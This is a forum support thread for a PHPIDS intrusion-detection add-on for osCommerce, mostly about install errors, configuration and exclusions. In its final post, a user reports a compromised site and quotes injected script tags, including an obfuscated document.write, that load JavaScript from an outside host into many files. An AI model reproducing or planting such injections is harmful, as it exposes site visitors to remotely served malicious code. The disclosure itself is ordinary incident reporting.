Jump to content
celextel

PHP Intrusion Detection System for osCommerce

Recommended Posts

Thanks for That Celextel,

 

I have had this logged about 15 times today - so I have made the code changes you suggested.

 

Is there a quick way to clear the log?

 

Thanks

 

We would try to include this function "Clear All Logs" in the next version.

Share this post


Link to post
Share on other sites

Hi,

 

Just installed on my second web-site and now I am getting the following error when trying to carry out the first test:

 

 

 

Line 170 is

$this->handle = new PDO(

 

I have checked the installation several times and cant see where the error may be, so I have had to revert my application_top.php back to the pre-mod condition.

 

Thanks

 

Perhaps you do not have the database installed. Please do that or go through each of the step carefully.

Share this post


Link to post
Share on other sites

Hi Celextel,

 

Found the problem - PDO was not enabled on the server that hosts my second site.

 

Host has now configured it and it works fine

 

Thanks


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Share this post


Link to post
Share on other sites

Hi Celextel,

 

Found the problem - PDO was not enabled on the server that hosts my second site.

 

Host has now configured it and it works fine

 

Thanks

 

Okay. Thanks for this info.

Share this post


Link to post
Share on other sites

Hi,

 

I Have just been testing my site as a bogus shopper.

 

When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7.

 

Would I be safe adding the following to my exclusions to stop this happening all the time:

 

Request.products_id

Get.products_id

Post.products_id

 

Thanks


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Share this post


Link to post
Share on other sites

Hi,

 

I Have just been testing my site as a bogus shopper.

 

When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7.

 

Would I be safe adding the following to my exclusions to stop this happening all the time:

 

Request.products_id

Get.products_id

Post.products_id

 

Thanks

 

It should be safe to add these under exclusions. We do not have this issue in our website. Are you using Ajax based shopping cart?

Share this post


Link to post
Share on other sites

NEW!!

 

PHPIDS for osCommerce 1.5

1. PHPIDS main configuration and Table creation codes moved to new installer file.

 

2. Link added to the PHPIDS Log Report file in the admin for deleting all log entries by a single click.

Share this post


Link to post
Share on other sites

Hi,

 

We do not have this issue in our website. Are you using Ajax based shopping cart?

 

Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think.

 

Thanks


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Share this post


Link to post
Share on other sites

Hi,

 

 

 

Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think.

 

Thanks

 

Okay, thanks.

Share this post


Link to post
Share on other sites

NEW!!

 

PHPIDS 0.6.4 is ready

1. Download "PHPIDS 0.6.4 (ZIP)" at the following page:

http://php-ids.org/downloads/

 

2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids".

 

3. Make sure that this renamed directory has the following directories directly in it:

docs

lib

tests

 

4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory overwriting the old files.

Share this post


Link to post
Share on other sites

Thanks for the fast reply.

 

The contribution works so well, and the install was straight forward.

 

One small change I have made is that I have taken the HTML element of the "Blocked.php" file from the IP trap contribution and included it in the banned.php file, so now rather than a "plain" banned page people who get banned will get the banned page with "Stop" image and black and red text etc.

 

If anyone is interested I will post the code for the new banned.php here

 

Thanks

 

Yes, I am interested in seeing the code. Also, I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions?

 

 

Thanks,

 

ed

Share this post


Link to post
Share on other sites

I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions?

 

 

Thanks,

 

ed

 

IP Trap contribution is not ours. Yes, you have to go in the reverse of the install instructions to un-install that. It should not be difficult.

Edited by celextel

Share this post


Link to post
Share on other sites

After running the installer I received this:

 

New Table for PHPIDS Log Report Created!

New Table for Banned IP Created!

 

Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133

 

 

All still ok?

 

thanks.

ed

Share this post


Link to post
Share on other sites

After running the installer I received this:

 

New Table for PHPIDS Log Report Created!

New Table for Banned IP Created!

 

Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133

 

 

All still ok?

 

thanks.

ed

 

Perhaps installer has already installed PHPIDS configuration settings. Please Check. If not, run the installer again.

Edited by celextel

Share this post


Link to post
Share on other sites

This looks to be a great contribution so thank you in advance, however, I am having a few problems.

 

Test 1 Shows this:

Your IP address has been logged -- Your IP is:

173.27.14.172

You shouldn't be here, so go away!

 

Versus what was in the documentation for 6.3

 

Test 2 Shows this:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@dreamdolldesigns.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

 

Browse to homepage Shows this:

1146 - Table 'dreamdol_ecom.TABLE_BANNED_IP' doesn't exist

select ip_address from TABLE_BANNED_IP where ip_status='0'

[TEP STOP]

 

Looking at phpMyAdmin shows 2 new tables - banned_ip & phpids_intrusions

 

Step A - includes/modules/osc_phpids.php

Currenly reads:

$oscBasePath = DIR_WS_INCLUDES;

$basePath = $oscBasePath . 'phpids/lib/'

 

Does not look like I need to mod the base path using v6.4 even though I don't have a catalog folder (installed in root by host) or is this my problem above?

 

 

thanks, ed

Share this post


Link to post
Share on other sites

I fixed the home page error regarding the missing DB table ... missed one update to includes/database_tables.php (oops)

 

Any thoughts on the others?

 

thanks, ed

Share this post


Link to post
Share on other sites

The plot thickens ...

 

I added my IP to the banned IP list through the admin site.

 

I got a vanilla banned message but when I clicked "Contact Us" ... I got this:

 

Fatal error: Call to a member function add_current_page() on a non-object in /home3/dreamdol/public_html/includes/application_top.php on line 397

 

Removed my IP from banned and same error no matter what page I try to go to!

 

Everything was working fine with this mod installed for over thirty minutes so hard to believe a core problem with application_top.

 

Please help

 

thanks, ed

Share this post


Link to post
Share on other sites

Well,

 

I got rid of the fatal error with a reboot ... even though I cleared my cache I guess it was stuck in a session ... So, ignore my last post ... will continue testing.

 

Still need help on the earlier post though.

 

thanks, ed

Share this post


Link to post
Share on other sites

This looks to be a great contribution so thank you in advance, however, I am having a few problems.

 

Test 1 Shows this:

Your IP address has been logged -- Your IP is:

173.27.14.172

You shouldn't be here, so go away!

 

Versus what was in the documentation for 6.3

 

Test 2 Shows this:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@dreamdolldesigns.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

thanks, ed

 

Do you have any other contribution like XS shield installed?

 

PHPIDS would not work with XS shield.

 

>> You shouldn't be here, so go away!

We do not have this warning message in PHPIDS. You need to find out as to which contribution is generating this message. It could be also from the server.

 

>> Internal Server Error

This is not related to PHPIDS. You should create a support request with the web host to do the needful in regard to this [error handling].

 

Please refer to the first page of this thread in regard to this:

Just to clarify, no, that's not a 404 you're getting. It's a 406. The 404 comes from not having your own error document (e.g., /406.shtml) for error 406. It's stupid to configure Apache that way (report a 404 when it can't find your error handler), but that's how most servers have it. Read http://www.catskilltech.com/freeSW/SMF/faqs/index.html#errorpages

Share this post


Link to post
Share on other sites

I try to get to my site and I am getting

 

Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

what did I fortget


Peace is possible.. Please don't give up.

 

"War is --the old betraying the young"

Share this post


Link to post
Share on other sites

I try to get to my site and I am getting

 

Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

what did I fortget

 

It is not finding the Init.php file inside the phpids directory. Please make sure that you have gone through following "Step-A: Core" carefully:

 

1. Download "PHPIDS 0.6.4 (ZIP)" or the latest version at:

http://php-ids.org/downloads/

 

2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids".

 

3. Make sure that this renamed directory has the following directories directly in it:

docs

lib

tests

 

4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory. If you upload this to some other directory, you need to change oscBasePath to this path in the includes/modules/osc_phpids.php file.

 

5. Grant write access [chmod 777] to the "tmp" folder [phpids/lib/IDS/tmp] and also to phpids_log.txt log file which is inside the "tmp" folder.

 

The last step is also most important.

Share this post


Link to post
Share on other sites

NEW!!

 

PHPIDS for osCommerce 1.6

1. A coding error / logical error has been corrected and usage of $_SERVER['PHP_SELF'] has been changed for security reasons in the banned_ip module file.

 

2. Usage of $_SERVER['PHP_SELF'] has been changed in the phpids_installer.php file.

 

3. PHPIDS 0.6.4 is ready. Overwrite the old files.

Share this post


Link to post
Share on other sites

I have installed PHPIDS for osCommerce 1.6.

 

On my localhost it works without any problems. But on the server I get get an error message:

 

Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92

 

I think it could be the PHP-Version:

localhost: 5.2.3

Server: 4.4.9

 

How we can change the code?

Share this post


Link to post
Share on other sites

I have installed PHPIDS for osCommerce 1.6.

 

On my localhost it works without any problems. But on the server I get get an error message:

 

Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92

 

I think it could be the PHP-Version:

localhost: 5.2.3

Server: 4.4.9

 

How we can change the code?

 

Yes, this works only in PHP 5. Changing the codes would be difficult.

Refer to the following URL in regard to this:

http://forum.php-ids.org/comments.php?DiscussionID=25&page=1#Item_0

 

convince your hoster to provide PHP5 or change your hoster. Drupal, phpMyAdmin, etc. pp. won't support PHP4 nevertheless in a few months. So I do not see why we should support an outdated platform.

Share this post


Link to post
Share on other sites

Hello, I just found a virus on my site:

 

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

includes/languages/english/index.php also german, spanish and italian

line 42

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

admin/index.php

line 12

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

my_admin_name/index.php

line 124

 

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

and so on, more than 20 files infected; the security mod will not prevent this.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×